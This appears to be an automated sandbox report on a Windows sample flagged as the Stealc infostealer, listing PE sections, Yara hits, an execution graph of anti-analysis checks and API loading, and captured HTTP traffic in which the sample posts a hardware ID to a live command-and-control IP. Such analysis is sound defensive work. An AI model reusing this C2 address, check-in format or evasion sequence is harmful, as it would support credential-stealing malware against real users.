                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [edx+ecx], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add dword ptr [eax+00000000h], eax
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  pop es
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax+00h], ah
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Rich Headers

                                  Programming Language:
                                  • [C++] VS2010 build 30319
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [LNK] VS2010 build 30319

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  0x10000x25b0000x22800e7159ffa3568b45fa3b2b8962d1733f1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  0x25e0000x29c0000x2008986414a4283016787d364827c1139d7unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  pypkqjdw0x4fa0000x1990000x198600244bd8c28c640b55e029112112d77f7dFalse0.9947862861570248data7.954735554227634IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  fqpfwnfj0x6930000x10000x4002783b76b2e8883456f84738cca2afa5eFalse0.76953125data6.045613105784281IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .taggant0x6940000x30000x22008e1cf350a09aa419ed23d4046073b9f8False0.05893841911764706DOS executable (COM)0.8287402387401129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                  Imports

                                  DLLImport
                                  kernel32.dlllstrcpy

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-09-27T11:26:07.373709+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.3780TCP

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Sep 27, 2024 11:26:06.398092031 CEST4970480192.168.2.5185.215.113.37
                                  Sep 27, 2024 11:26:06.404483080 CEST8049704185.215.113.37192.168.2.5
                                  Sep 27, 2024 11:26:06.404596090 CEST4970480192.168.2.5185.215.113.37
                                  Sep 27, 2024 11:26:06.404795885 CEST4970480192.168.2.5185.215.113.37
                                  Sep 27, 2024 11:26:06.409606934 CEST8049704185.215.113.37192.168.2.5
                                  Sep 27, 2024 11:26:07.132663965 CEST8049704185.215.113.37192.168.2.5
                                  Sep 27, 2024 11:26:07.132807970 CEST4970480192.168.2.5185.215.113.37
                                  Sep 27, 2024 11:26:07.137233973 CEST4970480192.168.2.5185.215.113.37
                                  Sep 27, 2024 11:26:07.144748926 CEST8049704185.215.113.37192.168.2.5
                                  Sep 27, 2024 11:26:07.373567104 CEST8049704185.215.113.37192.168.2.5
                                  Sep 27, 2024 11:26:07.373708963 CEST4970480192.168.2.5185.215.113.37
                                  Sep 27, 2024 11:26:11.487101078 CEST4970480192.168.2.5185.215.113.37

                                  HTTP Request Dependency Graph

                                  • 185.215.113.37

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.549704185.215.113.37801216C:\Users\user\Desktop\file.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 27, 2024 11:26:06.404795885 CEST89OUTGET / HTTP/1.1
                                  Host: 185.215.113.37
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Sep 27, 2024 11:26:07.132663965 CEST203INHTTP/1.1 200 OK
                                  Date: Fri, 27 Sep 2024 09:26:07 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Sep 27, 2024 11:26:07.137233973 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----KFBAECBAEGDGDHIEHIJJ
                                  Host: 185.215.113.37
                                  Content-Length: 211
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 36 33 33 39 39 32 46 39 46 35 31 36 36 30 34 39 33 34 38 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 2d 2d 0d 0a
                                  Data Ascii: ------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="hwid"AE633992F9F51660493485------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="build"save------KFBAECBAEGDGDHIEHIJJ--
                                  Sep 27, 2024 11:26:07.373567104 CEST210INHTTP/1.1 200 OK
                                  Date: Fri, 27 Sep 2024 09:26:07 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 8
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 59 6d 78 76 59 32 73 3d
                                  Data Ascii: YmxvY2s=


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:05:26:04
                                  Start date:27/09/2024
                                  Path:C:\Users\user\Desktop\file.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                  Imagebase:0x940000
                                  File size:1'828'864 bytes
                                  MD5 hash:219066AC9697D1CDEB536BC4EA74C123
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2045915798.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2090680717.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:8.3%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:10.1%
                                    Total number of Nodes:2000
                                    Total number of Limit Nodes:24
                                    execution_graph 13237 9569f0 13282 942260 13237->13282 13261 956a64 13262 95a9b0 4 API calls 13261->13262 13263 956a6b 13262->13263 13264 95a9b0 4 API calls 13263->13264 13265 956a72 13264->13265 13266 95a9b0 4 API calls 13265->13266 13267 956a79 13266->13267 13268 95a9b0 4 API calls 13267->13268 13269 956a80 13268->13269 13434 95a8a0 13269->13434 13271 956b0c 13438 956920 GetSystemTime 13271->13438 13273 956a89 13273->13271 13275 956ac2 OpenEventA 13273->13275 13277 956af5 CloseHandle Sleep 13275->13277 13278 956ad9 13275->13278 13280 956b0a 13277->13280 13281 956ae1 CreateEventA 13278->13281 13280->13273 13281->13271 13635 9445c0 13282->13635 13284 942274 13285 9445c0 2 API calls 13284->13285 13286 94228d 13285->13286 13287 9445c0 2 API calls 13286->13287 13288 9422a6 13287->13288 13289 9445c0 2 API calls 13288->13289 13290 9422bf 13289->13290 13291 9445c0 2 API calls 13290->13291 13292 9422d8 13291->13292 13293 9445c0 2 API calls 13292->13293 13294 9422f1 13293->13294 13295 9445c0 2 API calls 13294->13295 13296 94230a 13295->13296 13297 9445c0 2 API calls 13296->13297 13298 942323 13297->13298 13299 9445c0 2 API calls 13298->13299 13300 94233c 13299->13300 13301 9445c0 2 API calls 13300->13301 13302 942355 13301->13302 13303 9445c0 2 API calls 13302->13303 13304 94236e 13303->13304 13305 9445c0 2 API calls 13304->13305 13306 942387 13305->13306 13307 9445c0 2 API calls 13306->13307 13308 9423a0 13307->13308 13309 9445c0 2 API calls 13308->13309 13310 9423b9 13309->13310 13311 9445c0 2 API calls 13310->13311 13312 9423d2 13311->13312 13313 9445c0 2 API calls 13312->13313 13314 9423eb 13313->13314 13315 9445c0 2 API calls 13314->13315 13316 942404 13315->13316 13317 9445c0 2 API calls 13316->13317 13318 94241d 13317->13318 13319 9445c0 2 API calls 13318->13319 13320 942436 13319->13320 13321 9445c0 2 API calls 13320->13321 13322 94244f 13321->13322 13323 9445c0 2 API calls 13322->13323 13324 942468 13323->13324 13325 9445c0 2 API calls 13324->13325 13326 942481 13325->13326 13327 9445c0 2 API calls 13326->13327 13328 94249a 13327->13328 13329 9445c0 2 API calls 13328->13329 13330 9424b3 13329->13330 13331 9445c0 2 API calls 13330->13331 13332 9424cc 13331->13332 13333 9445c0 2 API calls 13332->13333 13334 9424e5 13333->13334 13335 9445c0 2 API calls 13334->13335 13336 9424fe 13335->13336 13337 9445c0 2 API calls 13336->13337 13338 942517 13337->13338 13339 9445c0 2 API calls 13338->13339 13340 942530 13339->13340 13341 9445c0 2 API calls 13340->13341 13342 942549 13341->13342 13343 9445c0 2 API calls 13342->13343 13344 942562 13343->13344 13345 9445c0 2 API calls 13344->13345 13346 94257b 13345->13346 13347 9445c0 2 API calls 13346->13347 13348 942594 13347->13348 13349 9445c0 2 API calls 13348->13349 13350 9425ad 13349->13350 13351 9445c0 2 API calls 13350->13351 13352 9425c6 13351->13352 13353 9445c0 2 API calls 13352->13353 13354 9425df 13353->13354 13355 9445c0 2 API calls 13354->13355 13356 9425f8 13355->13356 13357 9445c0 2 API calls 13356->13357 13358 942611 13357->13358 13359 9445c0 2 API calls 13358->13359 13360 94262a 13359->13360 13361 9445c0 2 API calls 13360->13361 13362 942643 13361->13362 13363 9445c0 2 API calls 13362->13363 13364 94265c 13363->13364 13365 9445c0 2 API calls 13364->13365 13366 942675 13365->13366 13367 9445c0 2 API calls 13366->13367 13368 94268e 13367->13368 13369 959860 13368->13369 13640 959750 GetPEB 13369->13640 13371 959868 13372 959a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13371->13372 13373 95987a 13371->13373 13374 959af4 GetProcAddress 13372->13374 13375 959b0d 13372->13375 13376 95988c 21 API calls 13373->13376 13374->13375 13377 959b46 13375->13377 13378 959b16 GetProcAddress GetProcAddress 13375->13378 13376->13372 13379 959b4f GetProcAddress 13377->13379 13380 959b68 13377->13380 13378->13377 13379->13380 13381 959b71 GetProcAddress 13380->13381 13382 959b89 13380->13382 13381->13382 13383 956a00 13382->13383 13384 959b92 GetProcAddress GetProcAddress 13382->13384 13385 95a740 13383->13385 13384->13383 13386 95a750 13385->13386 13387 956a0d 13386->13387 13388 95a77e lstrcpy 13386->13388 13389 9411d0 13387->13389 13388->13387 13390 9411e8 13389->13390 13391 941217 13390->13391 13392 94120f ExitProcess 13390->13392 13393 941160 GetSystemInfo 13391->13393 13394 941184 13393->13394 13395 94117c ExitProcess 13393->13395 13396 941110 GetCurrentProcess VirtualAllocExNuma 13394->13396 13397 941141 ExitProcess 13396->13397 13398 941149 13396->13398 13641 9410a0 VirtualAlloc 13398->13641 13401 941220 13645 9589b0 13401->13645 13404 941249 13405 94129a 13404->13405 13406 941292 ExitProcess 13404->13406 13407 956770 GetUserDefaultLangID 13405->13407 13408 9567d3 13407->13408 13409 956792 13407->13409 13415 941190 13408->13415 13409->13408 13410 9567b7 ExitProcess 13409->13410 13411 9567c1 ExitProcess 13409->13411 13412 9567a3 ExitProcess 13409->13412 13413 9567ad ExitProcess 13409->13413 13414 9567cb ExitProcess 13409->13414 13414->13408 13416 9578e0 3 API calls 13415->13416 13418 94119e 13416->13418 13417 9411cc 13422 957850 GetProcessHeap RtlAllocateHeap GetUserNameA 13417->13422 13418->13417 13419 957850 3 API calls 13418->13419 13420 9411b7 13419->13420 13420->13417 13421 9411c4 ExitProcess 13420->13421 13423 956a30 13422->13423 13424 9578e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13423->13424 13425 956a43 13424->13425 13426 95a9b0 13425->13426 13647 95a710 13426->13647 13428 95a9c1 lstrlen 13430 95a9e0 13428->13430 13429 95aa18 13648 95a7a0 13429->13648 13430->13429 13432 95a9fa lstrcpy lstrcat 13430->13432 13432->13429 13433 95aa24 13433->13261 13435 95a8bb 13434->13435 13436 95a90b 13435->13436 13437 95a8f9 lstrcpy 13435->13437 13436->13273 13437->13436 13652 956820 13438->13652 13440 95698e 13441 956998 sscanf 13440->13441 13681 95a800 13441->13681 13443 9569aa SystemTimeToFileTime SystemTimeToFileTime 13444 9569e0 13443->13444 13445 9569ce 13443->13445 13447 955b10 13444->13447 13445->13444 13446 9569d8 ExitProcess 13445->13446 13448 955b1d 13447->13448 13449 95a740 lstrcpy 13448->13449 13450 955b2e 13449->13450 13683 95a820 lstrlen 13450->13683 13453 95a820 2 API calls 13454 955b64 13453->13454 13455 95a820 2 API calls 13454->13455 13456 955b74 13455->13456 13687 956430 13456->13687 13459 95a820 2 API calls 13460 955b93 13459->13460 13461 95a820 2 API calls 13460->13461 13462 955ba0 13461->13462 13463 95a820 2 API calls 13462->13463 13464 955bad 13463->13464 13465 95a820 2 API calls 13464->13465 13466 955bf9 13465->13466 13696 9426a0 13466->13696 13474 955cc3 13475 956430 lstrcpy 13474->13475 13476 955cd5 13475->13476 13477 95a7a0 lstrcpy 13476->13477 13478 955cf2 13477->13478 13479 95a9b0 4 API calls 13478->13479 13480 955d0a 13479->13480 13481 95a8a0 lstrcpy 13480->13481 13482 955d16 13481->13482 13483 95a9b0 4 API calls 13482->13483 13484 955d3a 13483->13484 13485 95a8a0 lstrcpy 13484->13485 13486 955d46 13485->13486 13487 95a9b0 4 API calls 13486->13487 13488 955d6a 13487->13488 13489 95a8a0 lstrcpy 13488->13489 13490 955d76 13489->13490 13491 95a740 lstrcpy 13490->13491 13492 955d9e 13491->13492 14422 957500 GetWindowsDirectoryA 13492->14422 13495 95a7a0 lstrcpy 13496 955db8 13495->13496 14432 944880 13496->14432 13498 955dbe 14577 9517a0 13498->14577 13500 955dc6 13501 95a740 lstrcpy 13500->13501 13502 955de9 13501->13502 13503 941590 lstrcpy 13502->13503 13504 955dfd 13503->13504 14593 945960 13504->14593 13506 955e03 14737 951050 13506->14737 13508 955e0e 13509 95a740 lstrcpy 13508->13509 13510 955e32 13509->13510 13511 941590 lstrcpy 13510->13511 13512 955e46 13511->13512 13513 945960 34 API calls 13512->13513 13514 955e4c 13513->13514 14741 950d90 13514->14741 13516 955e57 13517 95a740 lstrcpy 13516->13517 13518 955e79 13517->13518 13519 941590 lstrcpy 13518->13519 13520 955e8d 13519->13520 13521 945960 34 API calls 13520->13521 13522 955e93 13521->13522 14748 950f40 13522->14748 13524 955e9e 13525 941590 lstrcpy 13524->13525 13526 955eb5 13525->13526 14753 951a10 13526->14753 13528 955eba 13529 95a740 lstrcpy 13528->13529 13530 955ed6 13529->13530 15097 944fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13530->15097 13532 955edb 13533 941590 lstrcpy 13532->13533 13534 955f5b 13533->13534 15104 950740 13534->15104 13536 955f60 13537 95a740 lstrcpy 13536->13537 13538 955f86 13537->13538 13539 941590 lstrcpy 13538->13539 13540 955f9a 13539->13540 13541 945960 34 API calls 13540->13541 13542 955fa0 13541->13542 13636 9445d1 RtlAllocateHeap 13635->13636 13639 944621 VirtualProtect 13636->13639 13639->13284 13640->13371 13642 9410c2 ctype 13641->13642 13643 9410fd 13642->13643 13644 9410e2 VirtualFree 13642->13644 13643->13401 13644->13643 13646 941233 GlobalMemoryStatusEx 13645->13646 13646->13404 13647->13428 13649 95a7c2 13648->13649 13650 95a7ec 13649->13650 13651 95a7da lstrcpy 13649->13651 13650->13433 13651->13650 13653 95a740 lstrcpy 13652->13653 13654 956833 13653->13654 13655 95a9b0 4 API calls 13654->13655 13656 956845 13655->13656 13657 95a8a0 lstrcpy 13656->13657 13658 95684e 13657->13658 13659 95a9b0 4 API calls 13658->13659 13660 956867 13659->13660 13661 95a8a0 lstrcpy 13660->13661 13662 956870 13661->13662 13663 95a9b0 4 API calls 13662->13663 13664 95688a 13663->13664 13665 95a8a0 lstrcpy 13664->13665 13666 956893 13665->13666 13667 95a9b0 4 API calls 13666->13667 13668 9568ac 13667->13668 13669 95a8a0 lstrcpy 13668->13669 13670 9568b5 13669->13670 13671 95a9b0 4 API calls 13670->13671 13672 9568cf 13671->13672 13673 95a8a0 lstrcpy 13672->13673 13674 9568d8 13673->13674 13675 95a9b0 4 API calls 13674->13675 13676 9568f3 13675->13676 13677 95a8a0 lstrcpy 13676->13677 13678 9568fc 13677->13678 13679 95a7a0 lstrcpy 13678->13679 13680 956910 13679->13680 13680->13440 13682 95a812 13681->13682 13682->13443 13684 95a83f 13683->13684 13685 955b54 13684->13685 13686 95a87b lstrcpy 13684->13686 13685->13453 13686->13685 13688 95a8a0 lstrcpy 13687->13688 13689 956443 13688->13689 13690 95a8a0 lstrcpy 13689->13690 13691 956455 13690->13691 13692 95a8a0 lstrcpy 13691->13692 13693 956467 13692->13693 13694 95a8a0 lstrcpy 13693->13694 13695 955b86 13694->13695 13695->13459 13697 9445c0 2 API calls 13696->13697 13698 9426b4 13697->13698 13699 9445c0 2 API calls 13698->13699 13700 9426d7 13699->13700 13701 9445c0 2 API calls 13700->13701 13702 9426f0 13701->13702 13703 9445c0 2 API calls 13702->13703 13704 942709 13703->13704 13705 9445c0 2 API calls 13704->13705 13706 942736 13705->13706 13707 9445c0 2 API calls 13706->13707 13708 94274f 13707->13708 13709 9445c0 2 API calls 13708->13709 13710 942768 13709->13710 13711 9445c0 2 API calls 13710->13711 13712 942795 13711->13712 13713 9445c0 2 API calls 13712->13713 13714 9427ae 13713->13714 13715 9445c0 2 API calls 13714->13715 13716 9427c7 13715->13716 13717 9445c0 2 API calls 13716->13717 13718 9427e0 13717->13718 13719 9445c0 2 API calls 13718->13719 13720 9427f9 13719->13720 13721 9445c0 2 API calls 13720->13721 13722 942812 13721->13722 13723 9445c0 2 API calls 13722->13723 13724 94282b 13723->13724 13725 9445c0 2 API calls 13724->13725 13726 942844 13725->13726 13727 9445c0 2 API calls 13726->13727 13728 94285d 13727->13728 13729 9445c0 2 API calls 13728->13729 13730 942876 13729->13730 13731 9445c0 2 API calls 13730->13731 13732 94288f 13731->13732 13733 9445c0 2 API calls 13732->13733 13734 9428a8 13733->13734 13735 9445c0 2 API calls 13734->13735 13736 9428c1 13735->13736 13737 9445c0 2 API calls 13736->13737 13738 9428da 13737->13738 13739 9445c0 2 API calls 13738->13739 13740 9428f3 13739->13740 13741 9445c0 2 API calls 13740->13741 13742 94290c 13741->13742 13743 9445c0 2 API calls 13742->13743 13744 942925 13743->13744 13745 9445c0 2 API calls 13744->13745 13746 94293e 13745->13746 13747 9445c0 2 API calls 13746->13747 13748 942957 13747->13748 13749 9445c0 2 API calls 13748->13749 13750 942970 13749->13750 13751 9445c0 2 API calls 13750->13751 13752 942989 13751->13752 13753 9445c0 2 API calls 13752->13753 13754 9429a2 13753->13754 13755 9445c0 2 API calls 13754->13755 13756 9429bb 13755->13756 13757 9445c0 2 API calls 13756->13757 13758 9429d4 13757->13758 13759 9445c0 2 API calls 13758->13759 13760 9429ed 13759->13760 13761 9445c0 2 API calls 13760->13761 13762 942a06 13761->13762 13763 9445c0 2 API calls 13762->13763 13764 942a1f 13763->13764 13765 9445c0 2 API calls 13764->13765 13766 942a38 13765->13766 13767 9445c0 2 API calls 13766->13767 13768 942a51 13767->13768 13769 9445c0 2 API calls 13768->13769 13770 942a6a 13769->13770 13771 9445c0 2 API calls 13770->13771 13772 942a83 13771->13772 13773 9445c0 2 API calls 13772->13773 13774 942a9c 13773->13774 13775 9445c0 2 API calls 13774->13775 13776 942ab5 13775->13776 13777 9445c0 2 API calls 13776->13777 13778 942ace 13777->13778 13779 9445c0 2 API calls 13778->13779 13780 942ae7 13779->13780 13781 9445c0 2 API calls 13780->13781 13782 942b00 13781->13782 13783 9445c0 2 API calls 13782->13783 13784 942b19 13783->13784 13785 9445c0 2 API calls 13784->13785 13786 942b32 13785->13786 13787 9445c0 2 API calls 13786->13787 13788 942b4b 13787->13788 13789 9445c0 2 API calls 13788->13789 13790 942b64 13789->13790 13791 9445c0 2 API calls 13790->13791 13792 942b7d 13791->13792 13793 9445c0 2 API calls 13792->13793 13794 942b96 13793->13794 13795 9445c0 2 API calls 13794->13795 13796 942baf 13795->13796 13797 9445c0 2 API calls 13796->13797 13798 942bc8 13797->13798 13799 9445c0 2 API calls 13798->13799 13800 942be1 13799->13800 13801 9445c0 2 API calls 13800->13801 13802 942bfa 13801->13802 13803 9445c0 2 API calls 13802->13803 13804 942c13 13803->13804 13805 9445c0 2 API calls 13804->13805 13806 942c2c 13805->13806 13807 9445c0 2 API calls 13806->13807 13808 942c45 13807->13808 13809 9445c0 2 API calls 13808->13809 13810 942c5e 13809->13810 13811 9445c0 2 API calls 13810->13811 13812 942c77 13811->13812 13813 9445c0 2 API calls 13812->13813 13814 942c90 13813->13814 13815 9445c0 2 API calls 13814->13815 13816 942ca9 13815->13816 13817 9445c0 2 API calls 13816->13817 13818 942cc2 13817->13818 13819 9445c0 2 API calls 13818->13819 13820 942cdb 13819->13820 13821 9445c0 2 API calls 13820->13821 13822 942cf4 13821->13822 13823 9445c0 2 API calls 13822->13823 13824 942d0d 13823->13824 13825 9445c0 2 API calls 13824->13825 13826 942d26 13825->13826 13827 9445c0 2 API calls 13826->13827 13828 942d3f 13827->13828 13829 9445c0 2 API calls 13828->13829 13830 942d58 13829->13830 13831 9445c0 2 API calls 13830->13831 13832 942d71 13831->13832 13833 9445c0 2 API calls 13832->13833 13834 942d8a 13833->13834 13835 9445c0 2 API calls 13834->13835 13836 942da3 13835->13836 13837 9445c0 2 API calls 13836->13837 13838 942dbc 13837->13838 13839 9445c0 2 API calls 13838->13839 13840 942dd5 13839->13840 13841 9445c0 2 API calls 13840->13841 13842 942dee 13841->13842 13843 9445c0 2 API calls 13842->13843 13844 942e07 13843->13844 13845 9445c0 2 API calls 13844->13845 13846 942e20 13845->13846 13847 9445c0 2 API calls 13846->13847 13848 942e39 13847->13848 13849 9445c0 2 API calls 13848->13849 13850 942e52 13849->13850 13851 9445c0 2 API calls 13850->13851 13852 942e6b 13851->13852 13853 9445c0 2 API calls 13852->13853 13854 942e84 13853->13854 13855 9445c0 2 API calls 13854->13855 13856 942e9d 13855->13856 13857 9445c0 2 API calls 13856->13857 13858 942eb6 13857->13858 13859 9445c0 2 API calls 13858->13859 13860 942ecf 13859->13860 13861 9445c0 2 API calls 13860->13861 13862 942ee8 13861->13862 13863 9445c0 2 API calls 13862->13863 13864 942f01 13863->13864 13865 9445c0 2 API calls 13864->13865 13866 942f1a 13865->13866 13867 9445c0 2 API calls 13866->13867 13868 942f33 13867->13868 13869 9445c0 2 API calls 13868->13869 13870 942f4c 13869->13870 13871 9445c0 2 API calls 13870->13871 13872 942f65 13871->13872 13873 9445c0 2 API calls 13872->13873 13874 942f7e 13873->13874 13875 9445c0 2 API calls 13874->13875 13876 942f97 13875->13876 13877 9445c0 2 API calls 13876->13877 13878 942fb0 13877->13878 13879 9445c0 2 API calls 13878->13879 13880 942fc9 13879->13880 13881 9445c0 2 API calls 13880->13881 13882 942fe2 13881->13882 13883 9445c0 2 API calls 13882->13883 13884 942ffb 13883->13884 13885 9445c0 2 API calls 13884->13885 13886 943014 13885->13886 13887 9445c0 2 API calls 13886->13887 13888 94302d 13887->13888 13889 9445c0 2 API calls 13888->13889 13890 943046 13889->13890 13891 9445c0 2 API calls 13890->13891 13892 94305f 13891->13892 13893 9445c0 2 API calls 13892->13893 13894 943078 13893->13894 13895 9445c0 2 API calls 13894->13895 13896 943091 13895->13896 13897 9445c0 2 API calls 13896->13897 13898 9430aa 13897->13898 13899 9445c0 2 API calls 13898->13899 13900 9430c3 13899->13900 13901 9445c0 2 API calls 13900->13901 13902 9430dc 13901->13902 13903 9445c0 2 API calls 13902->13903 13904 9430f5 13903->13904 13905 9445c0 2 API calls 13904->13905 13906 94310e 13905->13906 13907 9445c0 2 API calls 13906->13907 13908 943127 13907->13908 13909 9445c0 2 API calls 13908->13909 13910 943140 13909->13910 13911 9445c0 2 API calls 13910->13911 13912 943159 13911->13912 13913 9445c0 2 API calls 13912->13913 13914 943172 13913->13914 13915 9445c0 2 API calls 13914->13915 13916 94318b 13915->13916 13917 9445c0 2 API calls 13916->13917 13918 9431a4 13917->13918 13919 9445c0 2 API calls 13918->13919 13920 9431bd 13919->13920 13921 9445c0 2 API calls 13920->13921 13922 9431d6 13921->13922 13923 9445c0 2 API calls 13922->13923 13924 9431ef 13923->13924 13925 9445c0 2 API calls 13924->13925 13926 943208 13925->13926 13927 9445c0 2 API calls 13926->13927 13928 943221 13927->13928 13929 9445c0 2 API calls 13928->13929 13930 94323a 13929->13930 13931 9445c0 2 API calls 13930->13931 13932 943253 13931->13932 13933 9445c0 2 API calls 13932->13933 13934 94326c 13933->13934 13935 9445c0 2 API calls 13934->13935 13936 943285 13935->13936 13937 9445c0 2 API calls 13936->13937 13938 94329e 13937->13938 13939 9445c0 2 API calls 13938->13939 13940 9432b7 13939->13940 13941 